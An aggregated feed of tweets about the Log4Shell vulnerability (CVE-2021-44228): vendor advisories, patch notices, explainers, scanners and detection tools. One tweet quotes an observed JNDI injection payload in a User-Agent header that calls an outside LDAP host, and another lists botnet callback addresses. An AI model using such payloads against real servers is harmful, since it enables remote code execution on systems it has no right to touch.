2021-12-21 14:01:52The Log4Shell/ Log4j Vulnerability (CVE-2021-44228) Explained https://t.co/g1EBYtBAT8 https://t.co/bduhGN53Re https://bit.ly/30LqrCXdwood87
2021-12-21 14:00:20Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2021-44228: 1.6M (audience size) CVE-2021-45046: 858.2K CVE-2021-3… https://t.co/CxgwuepWFE https://twitter.com/i/web/status/1473292178147401731CVEtrends
2021-12-21 13:54:32CVE-2021-44228 - #Log4j - MINECRAFT VULNERABLE! (and SO MUCH MORE) https://t.co/ZgQlCj9Jhn via @YouTube #IT #security #cybersecurity https://youtu.be/7qoPDq41xhQSamuraiK7
2021-12-21 13:50:38Microsoft’s Response to CVE-2021-44228 Apache Log4j 2 https://t.co/VeIm3G417v #Pentesting #CVE #Apache… https://t.co/sJIRHIFa4m https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/ https://twitter.com/i/web/status/1473289521194221576ptracesecurity
2021-12-21 13:47:04VMware Site Recovery Manager is getting patch resolve CVE-2021-44228 and CVE-2021-45046. https://t.co/fApY5Buv7N https://dy.si/M3qtDSeanWilliams68
2021-12-21 13:42:14CVE-2021-44228, CVE-2021-45046, CVE-2021-4104: Frequently Asked Questions About Log4Shell and Associated Vulnerabil… https://t.co/Q8AMV3Hhd7 https://twitter.com/i/web/status/14732866415024087081Ivango1
2021-12-21 13:41:12CVE-2021-44228, CVE-2021-45046, CVE-2021-4104: Frequently Asked Questions About Log4Shell and Associated Vulnerabil… https://t.co/QEegvb5RAb https://twitter.com/i/web/status/1473286892686745609Lori_Riot
2021-12-21 13:40:37Die Automatisierungsplattform FLOWSTER Studio ist nicht von der Sicherheitslücke CVE-2021-44228 (Log4j) betroffen.… https://t.co/Uzl0zTTs63 https://twitter.com/i/web/status/1473287038468304899fs_flowster
2021-12-21 13:20:16🟠¿Qué sabemos hasta hoy de #Log4j CVE-2021-44228?🔍 Compartimos este artículo de @AkamaiES con los hallazgos más imp… https://t.co/QxyDVVBPtV https://twitter.com/i/web/status/1473282103357984768QintegraC
2021-12-21 13:15:39Log4Shell (CVE-2021-44228) is bad, but that doesn’t mean everything is bad. Even F5 Labs’ resident pessimist thinks… https://t.co/MJ835DzAEu https://twitter.com/i/web/status/1473277434975956995DojsCamargo
2021-12-21 13:15:25CVE-2021-44228.borgesguerardi
2021-12-21 13:11:42CVE-2021-44228の悪用と緩和:Log4j のリモートコード実行 (RCE) | コンテナ・セキュリティ | Sysdigブログ | コンテナ・Kubernetes環境向けセキュリティ・モニタリング プラットフォーム https://t.co/4pVorY0cwG https://www.scsk.jp/sp/sysdig/blog/container_security/cve-2021-44228log4j_rce.htmlraiseiseisei
2021-12-21 12:40:16Neuer Blogeintrag: Zusammenfassung zum CVE-2021-44228 aus Oracle Datenbank und Middleware Sicht https://t.co/nKUvX4vPW5 http://dlvr.it/SFnG7FRobotron_TecCh
2021-12-21 12:10:12Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround. https://t.co/ytYRzDes7b https://dy.si/FnHW46virtualquebec
2021-12-21 12:00:40@microsoft Guidance for preventing, detecting, and hunting for CVE-2021-44228 #log4j 2 exploitation https://t.co/D7EkysXvkI https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/ESFERARED
2021-12-21 11:41:17SAP on IBM i: System scan for Log4j vulnerability (CVE-2021-44228) https://t.co/IbsAdkNXpd https://ift.tt/3EaBP9aabap4sap
2021-12-21 11:40:56fail2ban-log4j #fail2ban filter that catches attacks against #log4j CVE-2021-44228 https://t.co/yLz2H84mZY GitHub… https://t.co/AVW4SmrXqW https://github.com/atnetws/fail2ban-log4j https://twitter.com/i/web/status/1473256110207479814hack_git
2021-12-21 11:40:48The Log4Shell/ Log4j Vulnerability (CVE-2021-44228) Explained https://t.co/bhBkod5XyU https://t.co/ErQ0GnVdCk https://bit.ly/3mjwENVKikAbrahams
2021-12-21 11:40:41CVE-2021-44228 – Log4Shell, a vulnerability shaking the web: https://t.co/INAWYJvadU https://autosec.se/cve-2021-44228-log4shell/AutoSecSWE
2021-12-21 11:40:33Workaround instructions to address CVE-2021-44228 and CVE-2021-45046 in vRealize... https://t.co/Eeolz0DvmY https://dy.si/B6GGzJMarcHuppert
2021-12-21 11:20:40Investigating CVE-2021-44228 Log4Shell Vulnerability https://t.co/I283LRYX7O https://dy.si/dhJcmW2alexky_ramos
2021-12-21 11:20:07https://t.co/1FQKD3kort Everything about CVE-2021-44228-LOG4J..!! @ADITYASHENDE17 @Ninad_Mathpati @u1tran00b… https://t.co/DnwyydUO2m https://akashpatil.me/log4j-guide-book.html https://twitter.com/i/web/status/1473251893652512770skypatil98
2021-12-21 10:50:48[ #BLOG ] : CVE-2021-44228 #Log4Shell : état des lieux, enjeux... Comment se protéger face à la #vulnérabilité la p… https://t.co/OOVeJvODNG https://twitter.com/i/web/status/1473242719401168909Akerva_FR
2021-12-21 10:50:42Workaround instructions to address CVE-2021-44228 in Site Recovery Manager https://t.co/FaENqH3rc4 https://dy.si/TWNnNcalexganser
2021-12-21 10:50:15Log4j (CVE-2021-44228) RCE Vulnerability Explained https://t.co/OHK0LAt9yg via @YouTube https://youtu.be/0-abhd-CLwQMuxath
2021-12-21 10:40:23SAP on IBM i: System scan for Log4j vulnerability (CVE-2021-44228) https://t.co/VMqT9a3kB8 #itpfed https://blogs.sap.com/2021/12/21/sap-on-ibm-i-system-scan-for-log4j-vulnerability-cve-2021-44228/?utm_source=dlvr.it&utm_medium=twitteritpfed
2021-12-21 10:20:17@WD4096 ①CVE-2021-44228(任意のコード実行) ⇒ 2.15で対応したが不十分だったため、2.16で対応(Lookup機能削除) ②CVE-2021-45046(DoS攻撃、一部の環境では任意のコード実行可能… https://t.co/Zb41yX82kA https://twitter.com/i/web/status/1473236043298373632mopper27af
2021-12-21 10:20:14GitHub - atnetws/fail2ban-log4j: fail2ban filter that catches attacks againts log4j CVE-2021-44228 https://t.co/nWPxJW079u https://github.com/atnetws/fail2ban-log4jmitstek
2021-12-21 10:11:04TDSi is pleased to confirm that none of our products are affected by the Apache Log4j (CVE-2021-44228) security vul… https://t.co/GyJoBLI8S5 https://twitter.com/i/web/status/1473231953755357189TDSi_Access
2021-12-21 10:10:47Act now against #Log4Shell (CVE-2021-44228) with this advisory from our #incidentresponse team. #Windows and #Linux… https://t.co/rwVYCvbqlR https://twitter.com/i/web/status/1473232798496530439FSecure_Consult
2021-12-21 09:50:15Aparece el CVE-2021-44228, nos cagamos en todo y toca parchear. Justo al acabar, aparece el CVE-2021-45046, nos vol… https://t.co/pIjfPYEhha https://twitter.com/i/web/status/1473228097709346821BetaAthe
2021-12-21 09:50:08Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround. https://t.co/G5bB6jls4M https://dy.si/mqv4HStuartGilks123
2021-12-21 09:40:48Log4j RCE CVE-2021-44228 Exploitation Detection - GitHub https://t.co/sNnHDZfQZp https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860bmitstek
2021-12-21 09:40:24Investigating CVE-2021-44228 Log4Shell Vulnerability https://t.co/TKBrgw2iDz https://dy.si/TEUs3AAmoroso77
2021-12-21 09:20:10Minecraft est vulnérable à la faille log4j CVE-2021-44228 à partir de la version 1.8.8. Nous discuterons entre autr… https://t.co/ChR7kDPUw4 https://twitter.com/i/web/status/1473220746679922698lemmings67
2021-12-21 09:10:58🔴INTEL🔴 Múltiples vulnerabilidades de severidad alta en productos INTEL: CVE-2021-45046,CVE-2021-44228 Más info… https://t.co/E2ugdwpHsS https://twitter.com/i/web/status/1473216840986140672GrupoICA_Ciber
2021-12-21 09:10:55🔴NETAPP🔴 Múltiples vulnerabilidades de severidad alta en productos NETAPP: CVE-2021-45105,CVE-2021-44228 Más inf… https://t.co/UzW0jdz0TL https://twitter.com/i/web/status/1473216884518670340GrupoICA_Ciber
2021-12-21 09:10:43Workaround instructions to address CVE-2021-44228 and CVE-2021-45046 in vRealize Operations 8.x https://t.co/v1Ny57gaW8 https://dy.si/5FhMREalexganser
2021-12-21 09:10:40The Log4Shell/ Log4j Vulnerability (CVE-2021-44228) Explained https://t.co/18rJuz0vUr https://t.co/y4f8KDTGbu https://bit.ly/3FjBIcHBilekSimon
2021-12-21 09:00:10🔴SONICWALL🔴 Múltiples vulnerabilidades de severidad alta en productos SONICWALL: CVE-2021-45046,CVE-2021-44228 M… https://t.co/2TJP259YcH https://twitter.com/i/web/status/1473216126322712580GrupoICA_Ciber
2021-12-21 08:50:11En @Forescout responden a la publicación de Apache sobre una vulnerabilidad de día cero (CVE-2021-44228) para Apach… https://t.co/8pCVsmNtxm https://twitter.com/i/web/status/1473212735479558146Ingecomayorista
2021-12-21 08:40:29Memo 警察庁:Javaライブラリ「Apache Log4j」の脆弱性(CVE-2021-44228)を標的とした攻撃の観測について https://t.co/yrAUQA7ysE 「Apache Log4j」の脆弱性に対する攻… https://t.co/VCt3Pa0vbm https://www.npa.go.jp/cyberpolice/important/2021/202112141.html https://twitter.com/i/web/status/1473210487882272773yoichitakita
2021-12-21 08:40:09CVE-2021-44228 #log4j #payloads Appear to already been circulating around the bug bounty (and likely attacker) circ… https://t.co/1VAAfrQZZc https://twitter.com/i/web/status/1473210724797366272hack_git
2021-12-21 08:40:06VMware Site Recovery Manager is getting patch resolve CVE-2021-44228 and CVE-2021-45046. https://t.co/5xYVaABgKW https://dy.si/7nZoRTinaKrogull
2021-12-21 08:40:04#Stormshield Visibility Center (SVC) &lt;= 1.6.0 affecté par les vulnérabilités #log4j (CVE-2021-44228, CVE-2021-45046… https://t.co/9s8CVdgf5k https://twitter.com/i/web/status/1473211574169088001idroxide
2021-12-21 08:20:12The Log4Shell/ Log4j Vulnerability (CVE-2021-44228) Explained https://t.co/vsIApS9hfX https://t.co/rR00rI3ETc https://bit.ly/3J0bX3oaxelconrad
2021-12-21 08:00:04@snapattackHQ @alexfrancow_sec You have a typo man. this is CVE-2021-44228..DavidiYehuda
2021-12-21 07:50:37Apache Log4j2のRCE脆弱性(CVE-2021-44228)を狙う攻撃観測 https://t.co/EYQX2AMC0C https://blogs.jpcert.or.jp/ja/2021/12/log4j-cve-2021-44228.htmloha000
2021-12-21 07:50:20Mi mañana hoy va de: "Mitigate Log4j CVE-2021-44228 Vulnerability in SAP Business One"... 😟😟😟wearedementors
2021-12-21 07:20:24第八話 ジェイのかたち ネットのかたち CVE-2021-44228(CVSS10.0) CVE-2021-45046(CVSS9.0) CVE-2021-45105(CVSS7.5) CVE-2021-4104(CVSS8.1… https://t.co/zpHoYHqJd2 https://twitter.com/i/web/status/1473189869174521862r_o_r_o_r_o_r_o
2021-12-21 07:11:27Security Alert: [Updated] Alert Regarding Arbitrary Code Execution Vulnerability (CVE-2021-44228) in Apache Log4j… https://t.co/oUnzJVrVk0 https://twitter.com/i/web/status/1473186865029255174cyberdian_cert
2021-12-21 07:01:26CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2021-12-21 05:50:17CVE-2021-44228 に関して、あまり良くない方に倒した判断を見てしまったけれど、問題が起こったときに責任を取るのは(形の上では)判断をした彼らだ。ひとこと言おうとした言葉を飲み込んだ。grove_twtr
2021-12-21 05:44:56This addresses CVE-2021-44228 and CVE-2021-45046. See the official H2O update. Starting with this release, the Pyth… https://t.co/b9qx5BslIB https://twitter.com/i/web/status/1473164281348870145gcpweekly
2021-12-21 05:44:41This addresses CVE-2021-44228 and CVE-2021-45046. See the official H2O update. As previously announced in the M87 r… https://t.co/B2AKX4uANm https://twitter.com/i/web/status/1473164306317512708gcpweekly
2021-12-21 05:21:35Security Alert: [Updated] Alert Regarding Arbitrary Code Execution Vulnerability (CVE-2021-44228) in Apache Log4j… https://t.co/FFrFXxVGEw https://twitter.com/i/web/status/1473159114515750913NaveedHamid
2021-12-21 05:00:10【警察庁】 Javaライブラリ「Apache Log4j」の脆弱性(CVE-2021-44228)を標的とした攻撃の観測について https://t.co/UCYjJN9pAh https://www.npa.go.jp/cyberpolice/important/2021/202112141.htmlTelematics_Blog
2021-12-21 04:50:20Apache Log3Shell | CVE-2021-44228 &amp; CVE-2021-45046 https://t.co/nXb4N0SBkJ https://r3dbird.blogspot.com/2021/12/apache-log3shell-cve-2021-44228-cve.htmldrok3r
2021-12-21 04:41:08GitHub Trending Archive, 19 Dec 2021, Java. logpresso/CVE-2021-44228-Scanner, FabricMC/fabric-example-mod, kozmer/l… https://t.co/ccl8avoDTw https://twitter.com/i/web/status/1473148766362677250motakasoft
2021-12-21 04:20:23Log4j2的JNDI注入漏洞(CVE-2021-44228)原理分析与思考 https://t.co/lBM98tcrl7 https://t.co/12NZLcJPNS https://ift.tt/3EdXugQ https://ift.tt/3sn4o0Jbuaqbot
2021-12-21 04:00:59Is it just me or is CVE-2021-44228’s cvss score of 10/10 not quite doing it justice? Is this maybe the Spinal Tap… https://t.co/ZSNdpdbrZE https://twitter.com/i/web/status/1473140516598517761Eric_Wacker
2021-12-21 04:00:31"Announcement Pandora FMS CVE-2021-44228: The critical Apache Log4j vulnerability" https://t.co/EhDYxeEb9z Via @PandoraFMS. https://pandorafms.com/blog/cve-2021-44228/ks7000
2021-12-21 03:58:05Centralized list of Storage and Backup systems affected by zero-day log4shell vulnerability (CVE-2021-44228) 🥶… https://t.co/7QtwlDN2cS https://twitter.com/i/web/status/1473137936778633222ICS_Mikko
2021-12-21 03:42:21Apache Log4j の脆弱性(CVE-2021-44228)が報告されておりますが、BricsCAD関連製品、BJ関連製品では Apache Log4j を使用しておりませんので、影響等はございません。… https://t.co/4TQyrnHh6v https://twitter.com/i/web/status/1473127795434082305zukenalfatech
2021-12-21 03:00:39当たり前だけどMicrosoft 365関連はlog4j関係ないよ。 Minecraftは一部の環境でダメみたいだけど。 ▼CVE-2021-44228 Apache Log4j 2 に対するマイクロソフトの対応 – Micros… https://t.co/i5oq2xl8si https://twitter.com/i/web/status/1473124224009400324mega_takoyaki
2021-12-21 02:50:13NetApp Active IQ Unified Manager における CVE-2021-44228 Apache Log4j 正式な修正って、9.10RC2 へのアップデートが回答になるの・・・? これ、Release Ca… https://t.co/YBRNE41gSq https://twitter.com/i/web/status/1473123536017723397makopicut
2021-12-21 02:13:51Citrix Security Advisory for CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105 | https://t.co/A6eXrAWP9a https://support.citrix.com/article/CTX335705ThomasPreischl
2021-12-21 02:11:20log4j 脆弱性関連 荒れてません?・・・ CVE-2021-44228 CVE-2021-45105 CVE-2021-45046 まだありそう・・・Msuta555
2021-12-21 02:10:13As sophisticated ransomware gangs and state actors continue to exploit and weaponize Log4Shell (CVE-2021-44228), ho… https://t.co/unsJQhIvFP https://twitter.com/i/web/status/1473113478886215680pentasecsystems
2021-12-21 02:01:06Apache Log4j2 の問題 (CVE-2021-44228) の更新情報 https://t.co/4abzsD1nO2 #すぐに読む https://aws.amazon.com/jp/security/security-bulletins/AWS-2021-006/akyoz
2021-12-21 01:30:18A new #attackerkb assesment on 'CVE-2021-44228 (Log4Shell)' has been created by blobla01. Attacker Value: 0 | Explo… https://t.co/fg6fnIq8D4 https://twitter.com/i/web/status/1473102519777775619Attackerkb_Bot
2021-12-21 01:21:13SELinux/iptablesとApache Log4jの任意のコード実行の脆弱性(Log4Shell: CVE-2021-44228) - https://t.co/qMZg7ufvs8 https://t.co/CKCaXjoqXw 隔離が重要の原則は変わらない。 http://security.sios.com https://security.sios.com/security/apache-log4j-selinux-poc-20211219.htmlkinneko
2021-12-21 00:31:29If you take the current log4j (CVE-2021-44228) situation seriously, you should not only check your own developments… https://t.co/wMjOEdc2kB https://twitter.com/i/web/status/1473085857666154496RuedigerKurz
2021-12-21 00:20:51「SIDfm の監視対象製品への影響」に製品情報を追加・更新しました。 Apache Log4j CVE-2021-44228 (Log4Shell) の影響有無リスト | SIDfm ブログ https://t.co/fAwr9W3IwQ https://www.softek.co.jp/SID/blog/archive/entry/20211215.htmlsoftek_jp
2021-12-21 00:20:08Apache Log4jの任意のコード実行の脆弱性(CVE-2021-44228)に関する注意喚起 https://t.co/wuVlbAfgBM @jpcert https://www.jpcert.or.jp/at/2021/at210050.htmloha000
2021-12-20 23:40:07#cchanabomemo Apache Log4jの任意のコード実行の脆弱性(CVE-2021-44228)に関する注意喚起 https://t.co/UTC1udFZL5 @jpcert 12/20情報更新 https://www.jpcert.or.jp/at/2021/at210050.htmlcchanabo
2021-12-20 22:50:45The #Log4Shell zero-day vulnerability (CVE-2021-44228) in #Log4j has caused significant concern recently. Element U… https://t.co/XHTxkd8yRl https://twitter.com/i/web/status/1473060941914804227elementanalytic
2021-12-20 22:50:40.@ProductCERT: An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228,… https://t.co/XjktVFcwDq https://twitter.com/i/web/status/1473061823901573129Woronka
2021-12-20 22:40:26An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046)… https://t.co/c0DADTOF9m https://twitter.com/i/web/status/1473058141826867210ProductCERT
2021-12-20 22:30:192021年12月10日、Javaベースのログ出力ライブラリ「Apache Log4j」に深刻な脆弱性(Log4Shell、CVE-2021-44228)があることが公表されました。「Apache Log4j」が広く利用されているラ… https://t.co/mufsmVUetZ https://twitter.com/i/web/status/1473055635323633664ritters2u
2021-12-20 22:30:11Just for the record, when we recorded this “12 Days of Malware,” CVE-2021-44228 had not been disclosed yet. https://t.co/0AZgqix2RhRayRedacted
2021-12-20 22:30:04A new advisory has been published: "SSA-397453: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-4… https://t.co/GlVfGqRtrY https://twitter.com/i/web/status/1473058074994872322ProductCERT
2021-12-20 22:10:19With our focus on CVE-2021-44228, we're turning back to our podcast on Managing 3rd Party Code Risk and why it shou… https://t.co/WByX1o4uF9 https://twitter.com/i/web/status/1473051853722198017KennaSecurity
2021-12-20 22:10:05Nuestro equipo de @TrendMicroRSRCH está activamente investigando #Log4Shell, también conocido como CVE-2021-44228.… https://t.co/ZnK8kVq8v2 https://twitter.com/i/web/status/1473052852037853184TrendMicroLATAM
2021-12-20 22:00:07VMware Site Recovery Manager is getting patch resolve CVE-2021-44228 and CVE-2021-45046. https://t.co/o3dWPY5SjB https://dy.si/RdR9Mswedersen
2021-12-20 21:51:20The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/7r0XkiLH2P https://twitter.com/i/web/status/1473046676659130376velez1066
2021-12-20 21:51:17The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/xgLtFM9gPi https://twitter.com/i/web/status/1473046787258785792velez1066
2021-12-20 21:41:04Learn how attackers are exploiting email infrastructure leveraging Log4j (CVE-2021-44228) vulnerabilities and how A… https://t.co/ppj5RCC0au https://twitter.com/i/web/status/1473043036078678016AbnormalSec
2021-12-20 21:40:06Learn how attackers are exploiting email infrastructure leveraging Log4j (CVE-2021-44228) vulnerabilities and how A… https://t.co/wJhah8lSDA https://twitter.com/i/web/status/1473044738655887364trip_elix
2021-12-20 21:11:26CVE-2021-44228(Apache Log4j Remote Code Execution) https://t.co/A1uKTeiGUp #Pentesting #CVE #Apache #RCE… https://t.co/QqWRlaTZEa https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce https://twitter.com/i/web/status/1473036276408492038ethical_enso
2021-12-20 21:00:29#Log4j2-CVE-2021-44228 Remote Code Injection In Log4j https://t.co/A7d1ShoDHm local-#log4j-vuln-scanner Simple loc… https://t.co/LtSofXU9Aj https://github.com/jas502n/Log4j2-CVE-2021-44228 https://twitter.com/i/web/status/1473033615130992640FragmentedSoul5
2021-12-20 20:50:15The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/rGw1GeTKXf https://twitter.com/i/web/status/1473032469033238546CaraWainwright7
2021-12-20 20:30:58CVE-2021-44228(Apache Log4j Remote Code Execution) https://t.co/hX3q9G113S #Pentesting #CVE #Apache #RCE… https://t.co/WijqCuWmpw https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce https://twitter.com/i/web/status/1473025545453678599ptracesecurity
2021-12-20 20:11:16Krótki film o log4shell i CVE-2021-44228. Zapraszam bo pewnie zaraz część treści będzie przeterminowana 😀 https://t.co/tIkrSYm9ca https://www.youtube.com/watch?v=RHN4sBe1EewMateuszChrobok
2021-12-20 19:51:01Apache Log4jの任意のコード実行の脆弱性(CVE-2021-44228)に関する注意喚起(更新)-JPCERT/CC https://t.co/UwGjGLNLUo https://www.jpcert.or.jp/at/2021/at210050.htmlfoxbook
2021-12-20 19:40:50An update on the Apache #Log4j CVE-2021-44228 vulnerability Products not Impacted and Remediated Products + IBM’s r… https://t.co/qjzTJYD3pC https://twitter.com/i/web/status/1473014434054516738Sever_i
2021-12-20 19:40:34Google Finds 35,863 Java Packages Using Defective #Log4j - https://t.co/HyygwOikuO (CVE-2021-44228) https://www.securityweek.com/google-finds-35863-java-packages-using-defective-log4jSecurityWeek
2021-12-20 19:40:15SecurityWeek: Google Finds 35,863 Java Packages Using Defective #Log4j - https://t.co/BQRLuU1BMU (CVE-2021-44228) https://www.securityweek.com/google-finds-35863-java-packages-using-defective-log4jMrsYisWhy
2021-12-20 19:30:23It’s been over a week since disclosure of CVE-2021-44228, aka Log4Shell, a remote code execution vulnerability in L… https://t.co/0qHDTGF2yg https://twitter.com/i/web/status/1473010908897198088ChariotSolution
2021-12-20 19:30:08Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation - Microsoft Security Blog… https://t.co/Fzr0SM0fp8 https://twitter.com/i/web/status/1473012124712583178icoleis
2021-12-20 19:30:05Now, I don't know what the specific flaw was (if I were a betting man, I'd be willing to guess CVE-2021-44228… https://t.co/odOHcWyPgN https://twitter.com/i/web/status/1473012513319137288Face4Wrestling
2021-12-20 19:20:31Even as the response and cleanup from Log4Shell (CVE-2021-44228) continues, we can learn from what happened and eme… https://t.co/cF0pTiJipd https://twitter.com/i/web/status/1473007814855606272F5Labs
2021-12-20 19:20:22Example CVE-2021-44228 payload: User agent: ${jndi:ldap://longwang-sword.com:1389/a} Domain currently resolves to… https://t.co/9VD0tSpDoQ https://twitter.com/i/web/status/1473008568299257859bad_packets
2021-12-20 19:20:06Shell script to remove JndiLookup class from Log4J 2 jar files, inside a WAR file, from CVE-2021-44228, a.k.a.,… https://t.co/c5VadNvJsl https://twitter.com/i/web/status/1473010265419563013davi_shiba
2021-12-20 19:00:38@MicroFocus "Summary of CyberRes impacted from Log4J or Log4shell/LogJam (CVE-2021-44228)" (ref:… https://t.co/AseskuLCok https://twitter.com/i/web/status/1473003278761967629attritionorg
2021-12-20 19:00:24⚠️UPDATED Log4j PSIRT Inclusive of CVE-2021-44228 &amp; CVE-2021-45046 Still Investigating CVE-2021-45105… https://t.co/HXLdlNLaoj https://twitter.com/i/web/status/1473004425371336711Cisco_East_SE
2021-12-20 19:00:14CVE-2021-44228, CVE-2021-45046, CVE-2021-4104: Frequently Asked Questions About Log4Shell and Associated Vulnerabil… https://t.co/rgnJcFjLLK https://twitter.com/i/web/status/1473004532112130051Lori_Riot
2021-12-20 18:51:46VMware Site Recovery Manager is getting patch resolve CVE-2021-44228 and CVE-202... https://t.co/HzrPOuc9t8 https://dy.si/opYYt52MarcHuppert
2021-12-20 18:51:45Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround. https://t.co/6ykpqueKot https://dy.si/RbeELCMarcHuppert
2021-12-20 18:51:19In case you missed this Xcode 13.2.1 "Xcode contains a copy of the log4j library that has the CVE-2021-44228 secu… https://t.co/kntmpkBnsY https://twitter.com/i/web/status/1473001403656323089ClassicII_MrMac
2021-12-20 18:51:10#Monitoring #Tools #Automated | Exploiting and Mitigating CVE-2021-44228: Log4j Remote Code Execution (RCE) https://t.co/IFYMBRnyz5 https://click.convertkit-mail.com/n4ukw9qko2hvhl9e34t6/x0hph3un3nrl92h5/aHR0cHM6Ly9zeXNkaWcuY29tL2Jsb2cvZXhwbG9pdC1kZXRlY3QtbWl0aWdhdGUtbG9nNGotY3ZlLw==hasdid
2021-12-20 18:32:26CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2021-12-20 18:22:59CRS and Log4j / Log4Shell / CVE-2021-44228 by @ChrFolini https://t.co/OXTuMeS0IB https://coreruleset.org/20211213/crs-and-log4j-log4shell-cve-2021-44228/anantshri
2021-12-20 18:21:08🚨 NEW: CVE-2021-44228 🚨 Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in conf… https://t.co/gZuqX9Mr9k https://twitter.com/i/web/status/1472995100523380746threatintelctr
2021-12-20 18:20:45@anantshri Related: https://t.co/NXTaq5rzYC Security Advisories / Bulletins / vendors Responses linked to Log4Shell (CVE-2021-44228) https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592captn3m0
2021-12-20 18:20:20Hello Everyone! The Spatial team has investigated the Log4Shell vulnerability (CVE-2021-44228) and (CVE-2021-45046)… https://t.co/vHyaqKio7s https://twitter.com/i/web/status/1472995196124209153spatialcorp
2021-12-20 18:11:27Microsoft’s Response to CVE-2021-44228 Apache Log4j 2 https://t.co/2Je4mzyj6i https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/way0utwest
2021-12-20 18:10:42There's a new post about IT Security (CVE-2021-44228 vulnerability in Apache Log4j library) on The Service Guy -… https://t.co/XIztroY4Ie https://twitter.com/i/web/status/1472992097426935810CTSIan
2021-12-20 17:47:13Investigating CVE-2021-44228 Log4Shell Vulnerability https://t.co/mPNvm2iZm9 https://dy.si/BJk3Wazaelcolon
2021-12-20 17:46:37Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround. https://t.co/SXovNfBgdB https://dy.si/svJqJazaelcolon
2021-12-20 17:40:57Officially recorded as CVE-2021-44228, it is a severe #vulnerability that could allow remote code execution in a se… https://t.co/YdXwQFEXVG https://twitter.com/i/web/status/1472984395648835586datopian
2021-12-20 17:23:34CVE-2021-44228 is another over-hyped problem that will not affect the majority of people. I'm amazed at how many pe… https://t.co/hLxYKduzGX https://twitter.com/i/web/status/1472978268223684618CSharp4EverMore
2021-12-20 17:21:27🚨 NEW: CVE-2021-45046 🚨 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/NB5COyCLrN https://twitter.com/i/web/status/1472979999447732231threatintelctr
2021-12-20 17:13:33Blog: Protection against the Apache Log4j2 Vulnerability (CVE-2021-44228) by Scott Altman, with information on how… https://t.co/SQ7Y8Uq52c https://twitter.com/i/web/status/1472975339114618886skubina123
2021-12-20 17:12:13VMware Site Recovery Manager is getting patch resolve CVE-2021-44228 and CVE-2021-45046. https://t.co/XASOgss2bp https://dy.si/bxP4gscandaletti
2021-12-20 17:11:55The Laconic Log4Shell FAQ December 14, 2021 What is Log4Shell (CVE-2021-44228)? A Remote Code Execution vulnerabili… https://t.co/F6xaUhrg7G https://twitter.com/i/web/status/1472976813874106370SecurityOsaka
2021-12-20 17:02:53Apache log4j Vulnerability CVE-2021-44228: Analysis and Mitigations https://t.co/QEOUZm9TZL https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/PVynckier
2021-12-20 16:53:09Investigating CVE-2021-44228 Log4Shell Vulnerability https://t.co/8nlMwDd69r https://dy.si/kWQydcarnoc77
2021-12-20 16:52:25Apache Log4j Vulnerability - CVE-2021-44228 - Specops Software https://t.co/92I53JnEU7 https://specopssoft.com/blog/apache-log4j-vulnerability/PVynckier
2021-12-20 16:50:35🚨 NEW: CVE-2021-45046 🚨 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/pzoDWF4Bxj https://twitter.com/i/web/status/1472972450241540097threatintelctr
2021-12-20 16:45:44The Log4Shell/ Log4j Vulnerability (CVE-2021-44228) Explained https://t.co/wQTGfITq6z https://t.co/yuSXJmXMpb https://bit.ly/3qagwj7mbellsca
2021-12-20 16:30:18Die #Log4Shell-Schwachstelle wird seit ihrer Offenlegung am 9. Dezember 2021 von Apache als CVE-2021-44228 aktiv au… https://t.co/D3i0oJU7RT https://twitter.com/i/web/status/1472967533258891265it__security
2021-12-20 16:26:28Another #IoT Botnet exploiting #Log4j #Log4Shell (CVE-2021-44228) IoCs: ldap://135.148.132.224:1389 http://152.67… https://t.co/IiqFEJpeML https://twitter.com/i/web/status/1472963158742556674tolisec
2021-12-20 16:26:04On 12/9/21, the information security world was rocked by the disclosure of Log4j (CVE-2021-44228), a zero-day vulne… https://t.co/xrwOW7r2W9 https://twitter.com/i/web/status/1472963251780476930renisac
2021-12-20 16:25:20#Log4Shell #log4j CVE-2021-44228 @ubuntu @ubuntu_sec - Can you please update your advisory for CVE-2021-44228? Som… https://t.co/oH3aMBECMk https://twitter.com/i/web/status/1472964065626578959TomSellers
2021-12-20 15:53:43The Log4Shell/ Log4j Vulnerability (CVE-2021-44228) Explained https://t.co/A7P8iG0RuR https://t.co/ZrjqbvWg9U https://bit.ly/3J8VVEnBantzMike
2021-12-20 15:30:32Workaround instructions to address CVE-2021-44228 in vCenter Server and vCenter Cloud Gateway (87081): https://t.co/wKfQYyTb2i https://kb.vmware.com/s/article/87081rovabu
